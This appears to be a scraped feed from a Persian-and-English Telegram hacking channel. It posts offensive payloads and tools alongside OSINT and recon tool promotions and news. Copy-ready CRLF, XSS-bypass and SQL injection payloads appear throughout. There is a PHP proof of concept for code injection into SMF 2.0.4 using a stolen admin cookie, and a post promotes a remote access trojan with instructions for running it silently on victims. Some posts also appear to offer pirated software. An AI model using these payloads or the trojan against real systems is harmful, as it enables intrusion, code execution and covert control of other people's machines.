OriON - OriON is a virtual machine in Spanish that incorporates several tools for Open Source Intelligence (OSINT) on people
Github
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2❤1
CRLF Injection Payload
payload :
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload :
%0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
خالی از لطف نیست دیدنش :
https://youtu.be/GBeEWje0VOI?si=21348IjixXjgryXT
https://youtu.be/GBeEWje0VOI?si=21348IjixXjgryXT
YouTube
ناتکوین، یه گپ با محوریت بازی و اقتصاد
آپدیت ۱۶ می:
نات کوین از طریق ان اف تی و بعد عرضه به پول تبدیل شده و متوسط دوستانی که توش فعال بودن حدود ۲۰۰ تا ۷۰۰ دلار به دست آوردن. متاسفم اگر به خاطر صحبت من به پول نرسیدین ولی دوست داشتین برسین.
۱. منم گفته بودم که اگر آدم ها زیاد بشن، ممکنه سرمایهگذاری…
نات کوین از طریق ان اف تی و بعد عرضه به پول تبدیل شده و متوسط دوستانی که توش فعال بودن حدود ۲۰۰ تا ۷۰۰ دلار به دست آوردن. متاسفم اگر به خاطر صحبت من به پول نرسیدین ولی دوست داشتین برسین.
۱. منم گفته بودم که اگر آدم ها زیاد بشن، ممکنه سرمایهگذاری…
👍7
little payload to bypass filters (in the proper context)
#Payload #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
/*${/*/;{/**/(alert)(1)}//>
#Payload #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3👍2❤1⚡1
👍2
Sql Injection Payload
Payload :
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
#Payload #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6👍1
مدیر وبسایت Breachedforum که محل خرید و فروش دیتابیس ها بود به 15 سال زندان در آمریکا محکوم شد!
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
😢16👍2❤1
LearnExploit
#VMware #Remote #Code
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6❤3👍1🔥1
SMF 2.0.4 admin payload code execution
⚪️ proof of concept that latest SMF (2.0.4) can be
exploited by php injection.
⚪️ payload code must escape from \', so you should try with something like that:
⚪️ p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
⚪️ For character_set - another story, as far as I remember, because here we have
⚪️ a nice stored xss. ;)
⚪️ to successfully exploit smf 2.0.4 we need correct admin's cookie:
Code:
#Execution #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/LearnExploit
exploited by php injection.
Code:
<?php
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>
#Execution #XSS #Payload
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9⚡3👍2👨💻1
Mantis is a command-line framework designed to automate the workflow of asset discovery, reconnaissance, and scanning. It takes the top-level domains as input, then seamlessly progresses to discovering corresponding assets, including subdomains and certificates. The tool performs reconnaissance on active assets and concludes with a comprehensive scan for vulnerabilities, secrets, misconfigurations and phishing domains - all powered by a blend of open-source and custom tools.
cd mantis/setup/docker
./docker-setup-macos.sh
./docker-setup-ubuntu.sh
LearnExploit
#Automates #Discovery #Vulnerability #Scanning
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4❤2👍1
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015
BugCod3
#Rat #Malware #Remote #Access
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11⚡5❤4
311138
#Burpsuite #Pro #Tools
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍3👎2
Udemy - Cisco CCNA Course With LABS
Download ( 42g )
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
Download ( 42g )
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6
Blind SQL Injection payload
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
if(now()=sysdate()%2Csleep(10)%2C0)
#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍2❤🔥1
On demand query API for Threat-Intel project.
apiosintDS is a python client library for public API lookup service over OSINT IoCs stored at DigitalSide Threat-Intel repository. It can be defined a Service as a Library tool designed to act both as a standard Python library to be included in your own Python application and as command line tool. Query can be performed against souspicious IPs, domains, urls and file hashes. Data stored has a 7 days retention.
The easy way via pip:
pip3 install apiosintDS
`apiosintDS
python3 -m pip install .`
apiosintDS -e 7cb796c875cccc9233d82854a4e2fdf0
apiosintDS -e h[REMOVED]p://193.35.18.147/bins/k.arm -st -p -nc
LearnExploit
#api #ioc #cybersecurity
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6👍3❤1
<Img Src=javascript:alert(1)>
OnError=location=src
https://brutelogic.com.br/gym.php?p05=%3CImg+Src=javascript:alert(1)+OnError=location=src%3E
#XSS
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9⚡2❤2❤🔥1